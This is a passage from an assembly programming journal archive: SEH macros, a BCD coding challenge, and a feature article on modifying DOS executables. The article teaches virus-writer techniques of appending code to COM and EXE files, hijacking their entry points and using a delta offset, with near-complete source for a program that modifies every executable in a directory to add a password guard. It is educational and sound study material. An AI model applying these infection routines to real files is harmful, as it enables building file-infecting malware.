RaiseException PROTO STDCALL dwExceptionCode:DWORD,
dwExceptionFlags:DWORD ,
nNumberOfArguments:DWORD, lpArguments:PTR DWORD
ENDIF
includelib kernel32.lib
TRY MACRO
PUSHCONTEXT ASSUMES
assume fs:nothing
; Install exception handler
push @@handler
push dword ptr fs:[0]
mov fs:[0], esp
POPCONTEXT ASSUMES
ENDM
CATCH MACRO exception
LOCAL @@invokeHandler
jmp @@removeHandler
@@handler:
IFNB <exception>
mov eax, [esp+4]
cmp dword ptr [eax], exception
je @@invokeHandler
mov eax, 1
ret
@@invokeHandler:
ENDIF
ENDM
ENDC MACRO
PUSHCONTEXT ASSUMES
assume fs:nothing
; Restore state
mov esp, dword ptr fs:[0]
mov esp, [esp]
@@removeHandler:
pop fs:[0]
add esp, 4
POPCONTEXT ASSUMES
ENDM
FINALLY MACRO
@@handler:
ENDM
ENDF MACRO
LOCAL @@removeHandler
PUSHCONTEXT ASSUMES
assume fs:nothing
; Restore state
cmp esp, dword ptr fs:[0]
je @@removeHandler
mov esp, dword ptr fs:[0]
mov esp, [esp]
@@removeHandler:
pop fs:[0]
add esp, 4
POPCONTEXT ASSUMES
ENDM
THROW MACRO exception
INVOKE RaiseException, exception, 0, 0, NULL
ENDM
; ---- flags ---
EXCEPTION_INT_DIVIDE_BY_ZERO equ 0C0000094h
SEH.ASM
by
X-Calibre
;Summary: Sample program for using SEH.INC
;Compatibility: MASM, Win32
.386
.Model Flat, StdCall
include windows.inc
include user32.inc
include SEH.inc
includelib user32.lib
.code
tst PROC
THROW 0E0000001h
ret
tst ENDP
start:
main PROC
TRY
sub edx, edx
mov ecx, 0
idiv ecx
CATCH(EXCEPTION_INT_DIVIDE_BY_ZERO)
.data
exceptionMsg BYTE "Exception occured",0
.code
INVOKE MessageBox, NULL, ADDR exceptionMsg, ADDR exceptionMsg,
MB_OK
ENDC
main ENDP
blah PROC
TRY
call tst
FINALLY
.data
finallyMsg BYTE "In FINALLY-block",0
.code
INVOKE MessageBox, NULL, ADDR finallyMsg, ADDR finallyMsg,
MB_OK
ENDF
blah ENDP
.data
finishMsg BYTE "Program finished",0
.code
INVOKE MessageBox, NULL, ADDR finishMsg, ADDR finishMsg, MB_OK
ret
end start
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
by Angel
Tsankov
Challenge
---------
Write as short as possible program to convert a two-digit BCD to
hexadecimal;
that is, the decimal representation of the output must represent the
hexadecimal representation of the input.
Solution
--------
The solution, in 14 bytes:
;Input AL = (A * 16) + B
;Output AL = (A * 10) + B
88 C4 MOV AH, AL ;AH = AL
82 E4 F0 AND AH, 0F0h ;AH = (A * 16)
D0 EC SHR AH, 1 ;AH = (A * 8)
28 E0 SUB AL, AH ;AL = (A * 8) + B
C0 EC 02 SHR AH, 2 ;AH = A * 2
00 E0 ADD AL, AH ;AL = (A * 10) + B
Submitted by Angel Tsankov <fn42551@...>.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Dec 99-Feb
00
:::\_____\::::::::::. Issue
7
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.comasmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"Extending DOS Executables"..........................Digital.Alchemist
"Creating a User-Friendly Interface"......................S.Sirajudeen
"ASM Building Blocks"...................................Laura.Fairhead
"Converting Strings to Numbers"...........................Chris.Dragan
"List Scan Library Routine".............................Laura.Fairhead
"Using the RTC"..........................................Jan.Verhoeven
"Chaos Animation".......................................Laura.Fairhead
"Inline Assembler With Modula"...........................Jan.Verhoeven
"Assembly on the Alpha Platform"........................Rudolf.Seemann
Column: Win32 Assembly Programming
"Direct Draw Samples"....................................X-Calibre
Column: The Unix World
"Enter fbcon".................................Konstantin.Boldyshev
Column: Assembly Language Snippets
"ToHex".....................................................Ronald
"Hex2ASCII"................................................cpuburn
"MMX ltostr".....................................Cecchinel.Stephan
Column: Issue Solution
"ScreenDump"........................................Laura.Fairhead
----------------------------------------------------------------------
+++++++++++++++++++Issue Challenge++++++++++++++++++
Dump the contents of the current console to a file
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by
mammon_
What? Late again? Wasn't there going to be a December issue?
Well, yeah, there was; unfortunately once again real-world concerns
interfered
with timely distribution. And, as usually happens with late issues, this one
is waaaaay oversized, almost 200K due to all the articles I crammed into it.
I
didn't even get a chance to include my linux kernel modules article...
This issue seems to have a bit of a 'Hex-to-ASCII' bent to it, mostly from
the
snippets but also from the conversion routines offered by Chris and Laura.
In
addition, some 'fringe' asm has been supplied with Jan's Modula article,
along
with an introduction to Alpha assembly language by Rudolph Seeman.
Konstantin
Boldyshev, who helps maintain the linuxassembly.org site, continues the Unix
trend with an introduction to frame-buffer programming under linux.
The two leading articles are both quite large and offer a wealth of
information
for the beginning and experienced asm programmer. Digital Alchemist has
produced
a work on applying virus techniques to non-destructive applications, and S.
Sirajudeen has tackled the huge problem of creating a decent UI in
console-mode
programs.
In this issue I have tried to leave the code comments as untouched as
possible;
the coding styles of the authors vary quite widely, and each clearly
demonstrates
the planning behind the program itself -- showing how the algorithm was
conceived before implementation. Stripping any of these examples of all but
comments will soon reveal the worksheet used by the coders to develop their
programs.
Finally, I have taken to formatting these issues in Vim under linux; to
check
margins and pagination I have begun proofing them in Netscape and
WordPerfect
[10 pt Courier, natch]; they should view fine in any web browser and in most
word processors; to those stuck with Notepad or Edit.com ... my apologies.
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Extending DOS
Executables
by Digital Alchemist
The reason behind this essay is to show how techniques first developed by
virus
writers can be used for benevolent purposes. It is my opinion that all
knowledge is good and viral techniques are certainly no exception. I will
lead
you through the development of a program called DOSGUARD which benignly
modifies DOS executables, both COM and EXE.
DESCRIPTION OF DOSGUARD
-----------------------
DOSGUARD is a DOS COM program which I developed in order to restrict access
to
certain programs on my computer. DOSGUARD modifies all of the COM and EXE
files in the current directory, adding code to each one that requires the
user
to correctly enter a password before running the original program.
DOSGUARD, while sufficient for this article, could use a little work in the
realm of user friendliness. More user feedback and a better way to specify
which files to be modified are needed. In addition, I have written a
version
of DOSGUARD that uses simple xor encryption to improve security.
DOSGUARD was written using turbo assembler.
STRUCTURE OF COM FILES
----------------------
Unlike the EXE file format, the programmer has no input into the segment
format
of COM files. All COM files consist of 1 segment only, with no predefined
distinction between data and code. After DOS finishes some preparatory
work,
the COM file is loaded at offset 100h. The first 256 bytes are known as the
Program Segment Prefix(PSP). Located at offset 80h is an important data
structure called the DTA or Data Transfer Area. The DTA is important, but
most
of the rest of the PSP can be ignored by the programmer. Before actually
starting execution of the COM program, DOS sets up the stack at the top of
the
segment(the highest memory address).
OUTLINE OF COM MODIFICATION
---------------------------
1. Open the file and read 1st 5 bytes.
2. Make sure the file is not really an EXE file because after DOS 6.0 some
files ending in ".com" were really EXEs.
3. Check to see if the file has already been modified by DOSGUARD by
checking
if the values of the 4th and 5th bytes match the DOSGUARD identification
string of "CG".
4. Make sure the file is not so large that when DOSGUARD adds its code it
doesn't exceed the 64k segment size.
5. If the file passes 2-4 then its ok to modify, so DOSGUARD opens it and
writes the code to the end of the file.
6. Calculate the size of the jump to the code we added and write the jump
instruction along with the identification string to the beginning of the
file.
I'll go over each of these steps in a little more detail with code snippets
where necessary. The complete source code for DOSGUARD can be found at the
end of the article and at my web page. Hopefully, the comments will be
enough
to explain any areas I don't discuss in detail.
Essentially, the way DOSGUARD modifies COM files is by inserting a jump at
the
beginning of the file which goes straight to the password authentication
code,
located at the end of the file. If the correct password is entered by the
user, then it will restore the 5 bytes that were overwritten by the jump and
the identification string and execute the program just like DOSGUARD was
never
there.
COM MODIFICATION - STEP 1
-------------------------
Once we've found a COM file, the first thing to do is open it. Then, after
running some tests on the file, we can determine if it is suitable for
modification. But first, we need to read the first 5 bytes because we'll
need them later.
mov ax, 3D02h ;Open file R/W
mov dx, 9Eh ;Filename, stored in DTA
int 21h
mov bx, ax ;Save file handle in bx
mov ax, 3F00h ;Read first 5 bytes from file
mov cx, 5
mov dx, offset obytes
int 21h
COM MODIFICATION - STEP 2
-------------------------
After DOS 6.0, some files with the COM extension are actually EXEs.
COMMAND.COM, for instance, is one of these. If we try to modify an EXE file
as
if it were a COM file, then we're going to really screw things up. To
prevent
this, we make sure that the string "MZ" doesn't appear in the first two
bytes of
the file. "MZ" is the string which tells DOS that a file is an EXE.
;Check to see if file is really an EXE
cmp word ptr[obytes], 'ZM'
je EXE
COM MODIFICATION - STEP 3
-------------------------
If the file had been previously altered by DOSGUARD, then the 4th and 5th
bytes
will contain the identification string "CG". We need to make sure we skip
files
that have this identification string.
;Check to see if file is already infected
;if it is, then skip it
cmp word ptr [obytes + 3], 'GC'
je NO_INFECT
COM MODIFICATION - STEP 4
-------------------------
Another thing to watch out for is the file's size. If the file will exceed
one segment in size when we add our code, then the file is too big to
modify.
;Make sure file isn't too large
mov ax, ds:[009Ah] ;Size of file from DTA
add ax, offset ENDGUARD - offset COMGUARD + 100h
jc NO_INFECT ;If ax overflows then don't infect
COM MODIFICATION - STEP 5
-------------------------
If the file is a suitable candidate for modification, then we simply write
our
code to the end of the file. Also, we have to save the original first 5
bytes
from the file somewhere in your code. In DOSGUARD's case, the 5 bytes are
already saved in the proper place because "obytes" is located within the
code
which we are about to write.
xor cx, cx ;cx = 0
xor dx, dx ;dx = 0
mov ax, 4202h ;Move file pointer to the end of
file
int 21h
mov ax, 4000h ;Write the code to the end of file
mov dx, offset COMGUARD
mov cx, offset ENDGUARD - offset COMGUARD
int 21h
COM MODIFICATION - STEP 6
-------------------------
The final step is to calculate the size of the jump to our code and write
the
opcode for the jump and the identification string over the first 5 bytes of
the
file.
mov ax, 4200h ;Move file pointer to beginning of
xor cx, cx ; file to write jump
xor dx, dx
int 21h
;Prepare the jump instruction to be written to beginning of file
xor ax, ax
mov byte ptr [bytes], 0E9h ;opcode for jmp
mov ax, ds:[009Ah] ;size of the file
sub ax, 3 ;size of the jump instruction
mov word ptr [bytes + 1], ax;size of the jump
;Write the jump
mov cx, 5; ;size to be written
mov dx, offset bytes
mov ax, 4000h
int 21h
mov ah, 3Eh ;Close file
int 21h
RESPONSIBILITIES OF INSERTED CODE
--------------------------------
There are two problems which the inserted code has to deal with. First,
since
the code could be located at any arbitrary offset within the segment, it
cannot
depend on the compiled absolute addresses of its data labels. To solve this
problem we use a technique virus writers call the delta offset. The delta
offset is the difference between the actual and compiled addresses of data.
Anytime our code accesses data in memory it adds the delta offset to the
data's
compiled address. The following piece of code finds the delta offset.
call GET_START
GET_START:
pop bp
sub bp, offset GET_START
The "call" pushes the current ip onto the stack, which is the actual address
of
the label "GET_START." Subtract the compiled address from the actual one
and
there's our delta offset.
The second problem is to make sure the first 5 bytes of the host are
restored to
their original values before we return from our jump and execute the host.
STRUCTURE OF EXE FILES
----------------------
The EXE file format is much more complicated than the COM format. The big
difference is that EXE files allow the program to specify how it wants its
segments to be laid out in memory, allowing programs to exceed one 64k
segment
in size. Most EXEs will have separate code, data, and stack segments.
All of this information is stored in the EXE Header. Here's a brief rundown
of
what the header looks like:
Offset Size Field
0 2 Signature. Will always be 'MZ'
2 2 Last Page Size. Number of bytes on the last
page of memory.
4 2 Page Count. Number of 512 byte pages in the file.
6 2 Relocation Table Entries. Number of items in the
relocation pointer table.
8 2 Header Size. Size of header in paragraphs,
including the relocation pointer table.
10 2 Minalloc
12 2 Maxalloc
14 2 Initial Stack Segment.
16 2 Initial Stack Pointer.
18 2 Checksum. (Usually ignored)
20 2 Initial Instruction Pointer
22 2 Initial Code Segment
24 2 Relocation Table Offset. Offset to the start of
the relocation pointer table.
26 2 Overlay Number. Primary executables(the ones we
wish to modify) always have this set to zero.
Following the EXE header is the relocation pointer table, with a variable
amount of blank space between the header and the start of the table. The
relocation table is a table of offsets. These offsets are combined with
starting segment values calculated by DOS to point to a word in memory where
the final segment address is written. Essentially, the relocation pointer
table is DOS's way to handle the dynamic placement of segments into physical
memory. This isn't a problem with COM files because there is only one
segment
and the program isn't aware of anything else. Following the relocation
pointer
table is another variable amount of reserved space and finally the program
body.
To successfully add code to an EXE file requires careful manipulation of the
EXE
header and relocation pointer table.
OUTLINE OF EXE MODIFICATION
---------------------------
1. Open the file and read the 1st 2 bytes(DOSGUARD actually reads 5).
2. Check for EXE signature "MZ".
3. Read the EXE header.
4. Check the file for previous infection.
5. Make sure that the Overlay Number is 0.
6. Make sure the file is a DOS EXE.
7. If the file passes 2-6 then it is ok to modify. The first step is to
check
the relocation pointer table to see if there is room to add 2 pointers.
If
there is room, then jump to step 9.
8. If there isn't enough room in the relocation pointer table, then
DOSGUARD
has to make room. It reads in the entire file after the relocation
pointer
table and writes it back out one paragraph higher in memory.
9. Save the original ss, sp, cs, and ip.
10. Adjust the file length to paragraph boundary.
11. Write code to the end of the file.
12. Adjust the EXE header to reflect the new starting segments and file
size.
13. Write out the header.
14. Modify the relocation pointer table.
The easiest way to think about EXE modification is to imagine that we are
adding a complete COM program to the end of the file. Our code will occupy
its
own segment located just after the host. This one segment will serve as a
code,
data, and stack segment just like in a COM program. Instead of inserting a
jump
to take us there, we will simply adjust the starting segment values in the
EXE
header to point to our segment.
EXE MODIFICATION - STEP 1
-------------------------
The same as with COM files, except that the only bytes we actually need are
the
first two. With EXE files we will use different methods for determining
previous modification(I try to avoid using the viral term "infection") and
for
transferring execution to our code.
EXE MODIFICATION - STEP 2
-------------------------
Check the first two bytes for the EXE signature "MZ". If the file doesn't
start with "MZ," then it isn't a DOS EXE.
cmp word ptr[obytes], 'ZM'
je EXE
EXE MODIFICATION - STEP 3
-------------------------
Now, DOSGUARD simply reads the EXE header into a 28 byte buffer. Later, we
will make the necessary changes to the header and write it back out.
xor cx, cx ;Move the file pointer back
xor dx, dx ;to the beginning of the file
mov ax, 4200h
int 21h
mov cx, 1Ch ;read exe header (28 bytes)
mov dx, offset exehead ;into buffer
mov ah, 3Fh
int 21h
EXE MODIFICATION - STEP 4
-------------------------
We don't use a signature string to mark EXE files. Instead, we compare the
code entry point with the size of the file. If the file has been previously
modified by DOSGUARD, then we know that the distance of the code entry point
from the end of the file will be the length of the code that DOSGUARD adds.
To
put things in mathematical terms:
(initial cs * 16) + (size of code DOSGUARD adds) + (size of header)
will equal the size of the file. The initial cs times 16 is the code entry
point, of course. You have to add the header size because it isn't loaded
into
memory along with the rest of the code and data.
;Make sure it hasn't already been infected
;If (initial CS * 16) + (size of code) + (size of header) ==
filesize
; then the file has already been infected
mov ax, word ptr [exehead+22]
mov dx, 16
mul dx
add ax, offset ENDGUARD2 - offset EXEGUARD
adc dx, 0
mov cx, word ptr [exehead+8]
add cx, cx
add cx, cx
add cx, cx
add cx, cx
add ax, cx
adc dx, 0
cmp ax, word ptr cs:[9Ah]
jne EXEOK
cmp dx, word ptr cs:[9Ch]
je NO_INFECT
EXE MODIFICATION - STEP 5
-------------------------
Another simple test that needs to be done is to make sure that the Overlay
Number stored in the EXE header is 0. The code for this is simple.
;Make sure Overlay Number is 0
cmp word ptr [exehead+26], 0
jnz NO_INFECT
EXE MODIFICATION - STEP 6
-------------------------
This part is kind of tricky. There are lots of files out there with the EXE
extension that aren't DOS executables. Both Windows and OS/2 use this
extension as well, for instance. To complicate matters, there isn't an easy
way to automatically distinguish DOS EXEs from the others. The technique
that
I use in DOSGUARD is to check the offset of the relocation pointer table and
make sure that it is less than 40h. This should always detect Windows and
OS/2
programs, but it sometimes raises false alarms on valid DOS files.
;Make sure it is a DOS EXE (as opposed to windows or OS/2)
cmp word ptr [exehead+24], 40h
jae NO_INFECT
EXE MODIFICATION - STEP 7
-------------------------
Now that we know we have a file that we can modify we just have to determine
if
its going to be easy to modify or a real pain. Here's the deal. The
relocation pointer table is always an even multiple of 16 bytes in size.
Each
pointer in the table is 4 bytes. For our purposes, we need to add 2
pointers to
the table. That means the table must have at least 8 bytes free in order to
leave it at its current size. If it doesn't have room for two more
pointers,
then we will have to make room. That means reading in the whole file after
the
table and writing it back out with 16 bytes more space for the table.
To find out if there is enough room, all you have to do is subtract the
offset
of the relocation pointer table and the number of entries in the table from
the
size of the header. The result is the amount of free space in the table.
All
of this information can be found in the handy dandy EXE header. Of course,
you
have to take into account the units that each of these values are stored in
(bytes, paragraphs, etc.)
;Check the relocation pointer table to see if there is
;room. If there isn't then we'll have to make room.
mov ax, word ptr [exehead+8];size of header in paragraphs
add ax, ax ;
add ax, ax ;Convert to double words.
sub ax, word ptr [exehead+6];Subtract # of entries each of
add ax, ax ;which is a double word and then
add ax, ax ;convert the final total to bytes.
sub ax, word ptr [exehead+24];If there are 8 bytes left after
cmp ax, 8 ;you subtract the offset to the
jc NOROOM ;reloc table then there is room.
jmp HAVEROOM
EXE MODIFICATION - STEP 8
-------------------------
The first thing to do is move the file pointer to the correct spot just
after
the last entry in the relocation pointer table.
xor cx, cx ;Move the file pointer to the end of
mov dx, word ptr [exehead+24] ;the relocation pointer table.
mov ax, word ptr [exehead+6];size of relocation table in doubles
add ax, ax ;* 4 to get bytes
add ax, ax
add dx, ax ;add that to start of table
push dx
mov ax, 4200h
int 21h
Now, DOSGUARD calculates the amount which needs to be written. This code is
in
the function called CALC_SIZE. When CALC_SIZE is finished, cx will hold the
number of pages and "lps" will hold the size of the last page since it
probably
will not be a full 512 byte page.
;dx holds the position in the file where we want to start reading.
;So, the amount to read in and write back out is equal to the size
;of the file minus dx.
mov cx, word ptr [exehead+2]
mov word ptr [lps], cx ;Copy Last Page Size into lps
mov cx, word ptr [exehead+4];Copy Num Pages into cx
cmp dx, word ptr [lps] ;If bytes to subtract are less than
jbe FINDLPS ;lps then just subtract them and
exit
mov ax, dx
xor dx, dx
mov cx, 512
div cx ;ax = pages to subtract
mov cx, word ptr [exehead+4];dx = remainder to subtract from lps
sub cx, ax
cmp dx, word ptr [lps]
jbe FINDLPS
sub cx, 1
mov ax, dx
sub ax, word ptr [lps]
mov dx, 512
sub dx, ax
FINDLPS:
sub word ptr [lps], dx ;Subtract start position and leave
;Num Pages the same
Once you know the amount of code you have to move, you have to come up with
a
way to simultaneously read and write from the same file without overwriting
data that hasn't been read yet. DOSGUARD's solution is to use a 16 byte
buffer. DOSGUARD's move loop reads 528 bytes and writes out 512 bytes with
each
iteration. In other words, it reads 16 bytes ahead of where it is writing
so
that it doesn't overwrite bytes before they're read. DOSGUARD has a number
of
functions for reading and writing pages, reading and writing paragraphs,
and
moving the file pointer around. It also has one function for moving the 16
bytes at the end of the 528 byte buffer in memory to the front. Well, I'll
shut
up now and show you the code for the move loop.
mov dx, offset buffer
call READ_PAGE
mov dx, offset para
call READ_PARA
call DECFP_PAGE
call WRITE_PAGE
call MOVE_PARA
dec cx
cmp cx, 1
je LASTPAGE
MOVELOOP:
mov dx, offset buffer + 16
call READ_PAGE
call DECFP_PAGE
call WRITE_PAGE
call MOVE_PARA
dec cx
cmp cx, 1
jne MOVELOOP
When DOSGUARD gets to the last page, it finishes things off by reading the
last
fraction of a page and then writing out those bytes plus the 16 bytes that
were
left buffered from the last iteration of the move loop.
LASTPAGE:
sub word ptr [lps], 16
mov cx, word ptr [lps]
mov dx, offset buffer + 16
mov ah, 3Fh
int 21h
push cx
mov dx, cx
neg dx
mov cx, -1
mov ax, 4201h
int 21h
pop cx
add cx, 16
mov dx, offset buffer
mov ah, 40h
int 21h
Last, but not least, there is a little maintanence to do.
;Got to adjust the file size since it will be used later
add word ptr cs:[9Ah], 16
adc word ptr cs:[9Ch], 0
;Increment the header size within the EXE header
add word ptr cs:[exehead+8], 1
;Change Page Count and Last Page Size in EXE header
cmp word ptr [exehead+2], 496
jae ADDPAGE
add word ptr [exehead+2], 16
jmp HAVEROOM
Oh yeah, there is one more condition that needs to be handled here. If the
last
page was almost full(496 or more bytes), then adding 16 bytes to the file
size
will overflow that page so you have to add a whole new page.
ADDPAGE:
;Adjust the header to add a page if the 16 additional bytes run
;over to a new page.
inc word ptr [exehead+4]
mov ax, 512
sub ax, word ptr [exehead+2]
mov dx, 16
sub dx, ax
mov word ptr [exehead+2], dx
EXE MODIFICATION - STEP 9
-------------------------
Whew! Step 8 was a doozy, but now we're almost done. All Step 9 requires
of
us is to save the original segment values from our victim. DOSGUARD saves
these values in the order that they are found within the EXE header.
mov ax, word ptr [exehead+14] ;save orig stack segment
mov [hosts], ax
mov ax, word ptr [exehead+16] ;save orig stack pointer
mov [hosts+2], ax
mov ax, word ptr [exehead+20] ;save orig ip
mov [hostc], ax
mov ax, word ptr [exehead+22] ;save orig cs
mov [hostc+2], ax
EXE MODIFICATION - STEP 10
--------------------------
It will make things a little easier later on if the end of the file we are
about to modify lies on a paragraph boundary. This way the starting ip for
the
new code that we're adding will always be zero.
;adjust file length to paragraph boundary
mov cx, word ptr cs:[9Ch]
mov dx, word ptr cs:[9Ah]
or dl, 0Fh
add dx, 1
adc cx, 0
mov cs:[9Ch], cx
mov cs:[9Ah], dx
mov ax, 4200h ;move file pointer to end of file
int 21h ;plus boundary
EXE MODIFICATION - STEP 11
--------------------------
Finally, we can write our code to the file. Just like with the COM file, we
will write our code to the end of the file. The difference is in how we get
there when its time to execute it. With COM files we used a jump. With EXE
files we adjust the starting cs:ip to point to our code.
mov cx, offset ENDGUARD2 - offset EXEGUARD ;write code to end
mov dx, offset EXEGUARD ;of the exe file
mov ah, 40h
int 21h
EXE MODIFICATION - STEP 12
--------------------------
With our code neatly tucked after the host program's code, its time to
modify
the EXE header so that our code is the first to execute. We also have to
adjust the size fields in the EXE header to take into account all the code
we
just added.
The first thing to is figure out what the starting segment values need to
be.
The starting cs will simply be the original file size divided by 16 minus
the
header size. The initial ip will be 0 because of Step 11. In DOSGUARD's
case
the ss will be the same as the cs and the sp will point to an address 256
bytes
after the end of our code. 256 bytes is plenty of room for DOSGUARD's
stack.
mov ax, word ptr cs:[9Ah] ;calculate module's CS
mov dx, word ptr cs:[9Ch] ;ax:dx contains orig file size
mov cx, 16 ;CS = file size / 16 - header size
div cx
sub ax, word ptr [exehead+8];header size in paragraphs
mov word ptr [exehead+22], ax ;ax is now initial cs
mov word ptr [exehead+14], ax ;ax is now initial ss
mov word ptr [exehead+20], 0 ;initial ip
mov word ptr [exehead+16], ENDGUARD2 - EXEGUARD + 100h ;initial
sp
This next bit of code calculates the new file size, in pages of course.
;calculate new file size
mov dx, word ptr cs:[9Ch]
mov ax, word ptr cs:[9Ah]
add ax, offset ENDGUARD2 - offset EXEGUARD + 200h
adc dx, 0
mov cx, 200h
div cx
mov word ptr [exehead+4], ax
mov word ptr [exehead+2], dx
add word ptr [exehead+6], 2
EXE MODIFICATION - STEP 13
--------------------------
Now, we should be through with the header so we can write it back out to the
file.
;Write out the new header
mov cx, 1Ch
mov dx, offset exehead
mov ah, 40h
int 21h
EXE MODIFICATION - STEP 14
--------------------------
Last, but not least, we have to modify the relocation pointer table. First,
we need to move the file pointer to where we need to add the new entries.
mov ax, word ptr [exehead+6];Get the # of relocatables
dec ax ;Position to add relocatable equals
dec ax ;(# - 2)*4 + table offset
mov cx, 4
mul cx
add ax, word ptr [exehead+24]
adc dx, 0
mov cx, dx
mov dx, ax
mov ax, 4200h ;move file pointer to position
int 21h
Now, we have to add two pointers to the table. The first points to "hosts,"
which is the stack segment of the original program. The second points to
"hostc+2," which holds the original program's code segment.
;Use exehead as a buffer for relocatables.
;Put two pointers in this buffer, first points to ss in
;hosts and second points to cs in hostc.
mov word ptr [exehead], ENDGUARD2 - EXEGUARD - 10
mov ax, word ptr [exehead+22]
mov word ptr [exehead+2], ax
mov word ptr [exehead+4], ENDGUARD2 - EXEGUARD - 4
mov word ptr [exehead+6], ax
mov cx, 8
mov dx, offset exehead
mov ah, 40h ;Write the 8 bytes.
int 21h
mov ah, 3Eh ;Close the file.
int 21h
RESPONSIBILITIES OF INSERTED CODE
---------------------------------
There are several items which the code module we added must take into
consideration. First of all, when it is finished, the state of registers,
etc.
must be exactly what the original program would expect them to be. For
instance, ax is set by DOS to indicate whether or not the Drive ID stored in
the FCBs is valid. So, the value of ax must be preserved by our code.
Also,
the original program may expect other registers to be set to initial values
of zero. And of course, the segment registers need to be restored after our
code's execution.
In order to actually restore control to the host, our code must restore ss
and
sp to their original values. Then, it jumps to the original cs:ip.
Also, inserted code can't be dependent on absolute addresses for its data.
Therefore, DOSGUARD accesses all data by its offset from the end of the
file.
CONCLUSION
----------
Hopefully, i've explained the techniques I used in developing DOSGUARD well
enough for you to develop your own binary modiying programs. As I mentioned
at
the beginning of this article, DOSGUARD has a lot a room for improvement.
If
you are interested then you should check out my web page and download the
source for ENCGUARD, a more secure version of DOSGUARD. A nice way to
extend
DOSGUARD would be to improve on the encryption techniques used in ENCGUARD.
If
I ever find the time I would like to write a Win32 version of DOSGUARD which
could safely modify the PE file format. If I ever do embark on such a task,
I'll be sure to let the readers of Assembly Programming Journal know about
it.
REFERENCES
----------
"The Giant Black Book of Computer Viruses, 2nd edition" by Mark Ludwig
CONTACT INFORMATION
-------------------
email: jjsimpso@...
web page: http://www4.ncsu.edu/~jjsimpso/index.html
Check out my web page for more information on my research into code
modification. Also, feel free to email me with ideas, corrections,
improvements, etc.
---------------------------BEGIN
DOSGUARD.ASM----------------------------------
.model tiny
.code
ORG 100h
START:
jmp BEGINCODE ;Jump the identification string
DB 'CG'
BEGINCODE:
mov dx, offset filter1
call FIND_FILES
mov dx, offset filter2
call FIND_FILES
mov ax, 4C00h ;DOS terminate
int 21h
;-------------------------------------------------------------------------
;Procedure to find and then infect files
;-------------------------------------------------------------------------
FIND_FILES:
mov ah, 4Eh ;Search for files matching filter
int 21h
SLOOP:
jc DONE
mov ax, 3D02h ;Open file R/W
mov dx, 9Eh ;Filename, stored in DTA
int 21h
mov bx, ax ;Save file handle in bx
mov ax, 3F00h ;Read first 5 bytes from file
mov cx, 5
mov dx, offset obytes
int 21h
;Check to see if file is really an EXE
cmp word ptr[obytes], 'ZM'
je EXE
COM:
;Check to see if file is already infected
;if it is, then skip it
cmp word ptr [obytes + 3], 'GC'
je NO_INFECT
;Make sure file isn't too large
mov ax, ds:[009Ah] ;Size of file
add ax, offset ENDGUARD - offset COMGUARD + 100h
jc NO_INFECT ;If ax overflows then don't infect
;If we made it this far then we know the file is safe to modify
call INFECT_COM
jmp NO_INFECT
EXE:
;Read the EXE Header
call READ_HEADER
jc NO_INFECT ;error reading file so skip it
;Make sure it hasn't already been infected
;If (initial CS * 16) + (size of EXEGUARD) + (size of header) ==
size
; then the file has already been infected
mov ax, word ptr [exehead+22]
mov dx, 16
mul dx
add ax, offset ENDGUARD2 - offset EXEGUARD
adc dx, 0
mov cx, word ptr [exehead+8]
add cx, cx
add cx, cx
add cx, cx
add cx, cx
add ax, cx
adc dx, 0
cmp ax, word ptr cs:[9Ah]
jne EXEOK
cmp dx, word ptr cs:[9Ch]
je NO_INFECT
EXEOK:
;Make sure Overlay Number is 0
cmp word ptr [exehead+26], 0
jnz NO_INFECT
;Make sure it is a DOS EXE (as opposed to windows or OS/2
cmp word ptr [exehead+24], 40h
jae NO_INFECT
call INFECT_EXE
NO_INFECT:
mov ax, 4F00h ;Find next file
int 21h
jmp SLOOP
DONE:
ret
;-------------------------------------------------------------------------
;Procedure to infect COM files
;-------------------------------------------------------------------------
INFECT_COM:
xor cx, cx ;cx = 0
xor dx, dx ;dx = 0
mov ax, 4202h ;Move file pointer to the end of
file
int 21h
mov ax, 4000h ;Write the code to the end of file
mov dx, offset COMGUARD
mov cx, offset ENDGUARD - offset COMGUARD
int 21h
mov ax, 4200h ;Move file pointer to beginning of
xor cx, cx ; file to write jump
xor dx, dx
int 21h
;Prepare the jump instruction to be written to beginning of file
xor ax, ax
mov byte ptr [bytes], 0E9h ;opcode for jmp
mov ax, ds:[009Ah] ;size of the file
sub ax, 3 ;size of the jump instruction
mov word ptr [bytes + 1], ax;size of the jump
;Write the jump
mov cx, 5; ;size to be written
mov dx, offset bytes
mov ax, 4000h
int 21h
mov ah, 3Eh ;Close file
int 21h
ret
;-------------------------------------------------------------------------
;Procedure to infect EXE files
;-------------------------------------------------------------------------
INFECT_EXE:
;Check the relocation pointer table to see if there is
;room. If there isn't then we'll have to make room.
mov ax, word ptr [exehead+8];size of header in paragraphs
add ax, ax ;
add ax, ax ;Convert to double words.
sub ax, word ptr [exehead+6];Subtract # of entries each of
add ax, ax ;which is a double word and then
add ax, ax ;convert the final total to bytes.
sub ax, word ptr [exehead+24];If there are 8 bytes left after
cmp ax, 8 ;you subtract the offset to the
jc NOROOM ;reloc table then there is room.
jmp HAVEROOM
NOROOM:
;Not enough room in the relocation table so we are going to
;have to add a paragraph to the table. As a result, we must
;read in the whole file after the relocation table and write
;it back out one paragraph down in memory.
xor cx, cx ;Move the file pointer to the end of
mov dx, word ptr [exehead+24] ;the relocation pointer table.
mov ax, word ptr [exehead+6];size of relocation table in doubles
add ax, ax ;* 4 to get bytes
add ax, ax
add dx, ax ;add that to start of table
push dx
mov ax, 4200h
int 21h
pop dx
call CALC_SIZE
cmp cx, 1
je LASTPAGE
mov dx, offset buffer
call READ_PAGE
mov dx, offset para
call READ_PARA
call DECFP_PAGE
call WRITE_PAGE
call MOVE_PARA
dec cx
cmp cx, 1
je LASTPAGE
